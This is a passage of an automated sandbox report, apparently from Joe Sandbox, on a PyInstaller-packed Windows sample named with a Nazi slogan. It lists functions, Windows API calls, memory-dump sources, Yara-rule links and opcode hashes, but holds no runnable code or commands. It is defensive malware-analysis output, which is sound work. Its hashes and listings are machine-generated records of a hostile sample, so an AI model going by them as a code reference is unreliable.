                                                                                                                                                                                                                                            Function 00007FF633D7EB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00007FF633D7B32A,?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A), ref: 00007FF633D7EBED
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                                            • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                            • Instruction ID: 7422d4e8f3036dac261518129888d41113bb2b43793f05dbd5aaa9a8b1a7c904
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63F06D54B0A20240FE5A5EE5985B2B546905F88B80F4C5730CD0FE67E2EE2CE481A210
                                                                                                                                                                                                                                            Function 00007FFDFAE81F32 Relevance: 1.3, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                                                            • Opcode ID: 7be56b9b5c195ef2355d3ed0a864c758a5bbc4b2e9c7b36c5c12c2a7c1a9fd28
                                                                                                                                                                                                                                            • Instruction ID: 0815945402276d60b86fa22a56c780c2c53503cd34cc8cc7ec1737994d11fac7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7be56b9b5c195ef2355d3ed0a864c758a5bbc4b2e9c7b36c5c12c2a7c1a9fd28
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B2F08122708B8185E304AB16F4106AAA7A0FB98FC4F188071EF9E47BADCE3CD481C700
                                                                                                                                                                                                                                            Function 00007FF633D7D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FF633D70C90,?,?,?,00007FF633D722FA,?,?,?,?,?,00007FF633D73AE9), ref: 00007FF633D7D63A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                                            • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                            • Instruction ID: 1a67376a0a3742251bd4409ebce51042f31dabe0049eacb0d2770a301575f88f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EF0F815F0924A45FE656FF1594377912A05F847A0F480730DD2EE67CAEE2CB580A610

                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                            Function 00007FF633D689E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                            • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                            • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                            • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                            • Instruction ID: 8cf410ab41b0fa40752e760cc4270562d31a1d9cbf9cda09278e672fccba3f4d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9D1A832A08B8286E7108FB4E8562AD3764FF84B58F401335DA6EA7BA5DF3CE155D700
                                                                                                                                                                                                                                            Function 00007FFDFAD63048 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFADC4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE13000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE71000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE74000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007E133319ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3962975190-0
                                                                                                                                                                                                                                            • Opcode ID: d8a6e0e72b6848609e29a44b0cba3310e6ec791779f206a0b46e58d07e77914d
                                                                                                                                                                                                                                            • Instruction ID: 9c6d0b533a1b572e9fd086abc4dd06a6d794b89d6aa36ce87aa723441fd0a555
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8a6e0e72b6848609e29a44b0cba3310e6ec791779f206a0b46e58d07e77914d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC314D72709A818AEB688F60E8607ED7364FB84744F44443ADA5E47BD8EF3CD648CB10
                                                                                                                                                                                                                                            Function 00007FF633D683C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D6842B
                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684AE
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684CD
                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684DB
                                                                                                                                                                                                                                            • FindClose.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684EC
                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684F5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                            • String ID: %s\*
                                                                                                                                                                                                                                            • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                            • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                            • Instruction ID: 3d6ec63bfd8af715c8e5da51951a36cb782d4503c1980f80a6f345d69cf020b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1417331A0C98285EA309BA4E4565BA7361FB94755FC00332DAAEE77D8EF3CE549D700
                                                                                                                                                                                                                                            Function 00007FFDFAF43229 Relevance: 12.3, APIs: 8, Instructions: 251fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$FileFind$00007ErrorF020FirstLastNext
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1171239525-0
                                                                                                                                                                                                                                            • Opcode ID: b84a2f744cee5a13916b1079a4c81b9897484e08d179ab741295abe408a7cb8c
                                                                                                                                                                                                                                            • Instruction ID: 4cabe8fa43cb0042de95939e3b11c3787b99cdbcfef7f0e8b50a0659997f49ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b84a2f744cee5a13916b1079a4c81b9897484e08d179ab741295abe408a7cb8c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24B19122B06A8385EB119F65D864A7D67A0FF4ABE4F448335DA6D437E8EF3CE1419300
                                                                                                                                                                                                                                            Function 00007FFDFAE82009 Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                                            • Opcode ID: 2d072e119b3f82c49d6f4ce91d3b7ce2e14bd39be51010dabf7c3b22418c2fca
                                                                                                                                                                                                                                            • Instruction ID: fa0f43729f12cd900f9b87a395131d883ac2b162ece683444516764cf1fbf0cf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d072e119b3f82c49d6f4ce91d3b7ce2e14bd39be51010dabf7c3b22418c2fca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B318F72709A818AEB64DF60E860BED33A0FB84755F404479DA5E47AD8EF7DC548C710
                                                                                                                                                                                                                                            Function 00007FFDFAF45A1F Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                                            • Opcode ID: 836932d6aed314119f7ddbe256598baef3b0bd20caf5fb751809a6c17d89e7ea
                                                                                                                                                                                                                                            • Instruction ID: b49737b5db68e9eebcad98279f39dc2f7fdc6b125540259617ba0e98f0d359ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 836932d6aed314119f7ddbe256598baef3b0bd20caf5fb751809a6c17d89e7ea
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD314172709F828AEB609F60E8507ED7365FB94748F44803ADA5D87AE9DF38D548C710
                                                                                                                                                                                                                                            Function 00007FF633D6D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                                            • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                            • Instruction ID: 43ff3b8166e9fd1da9e9b85cd0cc03098369cc9465b4e54a762af958436dc8e1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92317672608B8586EB60CFA0E8417ED7360FB84704F444139DA5E97B99DF7CD648D710
                                                                                                                                                                                                                                            Function 00007FF633D85C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85C45
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D855AC
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF633D7A8DF,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7A909
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF633D7A8DF,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7A92E
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85C34
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D8560C
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85EAA
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85EBB
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85ECC
                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF633D8610C), ref: 00007FF633D85EF3
                                                                                                                                                                                                                                            Memory Dump Source
